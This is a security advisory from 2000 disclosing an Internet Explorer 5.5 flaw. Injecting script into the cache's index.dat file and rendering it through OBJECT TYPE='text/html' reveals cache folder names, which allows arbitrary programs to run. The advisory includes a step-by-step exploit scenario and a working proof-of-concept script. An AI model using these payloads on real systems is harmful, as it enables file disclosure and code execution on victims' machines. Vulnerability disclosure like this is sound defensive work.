OBJECT TYPE="text/html" may allow executing arbitrary programs in IE 5.5

Systems affected:
IE 5.5 probably 5.x and Outlook/Outlook Express, have not tested

Risk: High
Date: 23 November 2000

Legal Notice:
This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute it unmodified. 
You may not modify it and distribute it or distribute parts of it without the author's 
written permission.

Disclaimer:
The opinions expressed in this advisory and program are my own and not of any company.
The usual standard disclaimer applies, especially the fact that Georgi Guninski
is not liable for any damages caused by direct or  indirect use of the information 
or functionality provided by this advisory or program.
Georgi Guninski, bears no responsibility for content or misuse of this advisory or program or any derivatives thereof.

Description:

Note: This is completely different issue from Advisory #28 "IE 5.x/Outlook allows executing arbitrary programs using .chm files and temporary internet files folder"
though both use some common stuff.
There is a security vulnerability in IE 5.5 (probably 5.x and Outlook) which allows
executing arbitratrary programs using OBJECT TYPE="text/html" and parsing index.dat 
by revealing the location of temporary internet files folder. 
This may lead to taking full control over user's computer.

Details:

Backround:
If one can inject a file on user's local disk and know its location it is possible to execute
arbitrary programs in at least two ways:
1) window.showHelp("c:\\dir\\hostile.chm")
2) <OBJECT CLASSID="clsid:000000000-0000-0000-00000-000000000002" CODEBASE="C:\DIR\HOSTILE.EXE">
So the question arise how to inject a specified file on user's disk.
A good way is to use the Temporary Internet Files Folder which contain cached documents and files.
The problem with it is there are several subfolders with random names.
But there is a special file "index.dat" which is something like a catalog or registry which
contains all visited URLs and which is more important the names of the random folders in its beginning.
It is locatated in C:/WINDOWS/Temporary Internet Files/Content.IE5/ under Win9x and in
C:/Documents and Settings/USERNAME/Local Settings/Temporary Internet Files/Content.IE5/
under Win2K - so under Win2K the username of the current user must be known or guessed which makes things more difficult.
It is possible to inject JavaScript in it by just doing:
window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>") because this URL shall be written in it.
So if it can be parsed by IE and the JavaScript be executed the names of the random folders will be known.
But Microsoft tries to prevent parsing non-HTML files and they have issued a security bulletin in August:
http://www.microsoft.com/technet/security/bulletin/MS00-055.asp
But it is possible to parse (render) non-HTML files in the following way:
<OBJECT TYPE="text/html" DATA="file://c:/file.dat"></OBJECT>
So the exploit scenario is:
1) inject JavaScript in index.dat by window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>")
The JavaScript is executed in index.dat and has access to its content, which allow to find the random directory names
2) parse/render index.dat by:
<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>
3) After the Temporary internet Files Folders are known inject for example chm files by:
<OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT>
4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm");

The presense of the random temporary internet files folders in index.dat is very dangerous - it means that every Cross Frame Security vulnerability or vulnerability that reads local files may lead to executing arbitrary programs. This means that a lot of my previous vulnerabilities are much more serious that I have realized then.

The code is:
 

--------parsedat.html------------------------------------------------ This demo is for Windows 9x - you must modify the source for Win2K. You may need to wait a few minutes if you have slow computer. If you have Pentium 500 or better  or use Win2K probably much less. It is expected a window with location "about:blank" to be opened containing index.dat -  the file where the random names of temporary internet files directories are kept  (they are random names in the beginning of the window) and the list of all visited URLs  among other stuff. Once the temporary internet files directories are know it is possible to  execute arbitrary programs thru cached files and showHelp() or OBJECT CODEBASE="...". If you don't see a window with location "about:blank" and content of index.dat close IE and  visit the page again. <SCRIPT> b=window.open("http://www.guninski.com/empty2.html?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>"); s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>'; //s='<OBJECT DATA="file://C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>'; // ^^^ This is for Win2K ------------you must change "Administrator" to the actual user name setTimeout("document.writeln(s)",5000); </SCRIPT> ---------------------------------------------------------------------

Workaround:
Disable Active Scripting and move the location of the Temporary Internet Files Folder to
unpredicatable location

Demonstration which opens index.dat which contains the Temporary Internet Files Folders and
the list of all visited URLs is available: 
http://www.guninski.com/parsedat.html

Vendor status:
Microsoft was contacted on 15 November 2000.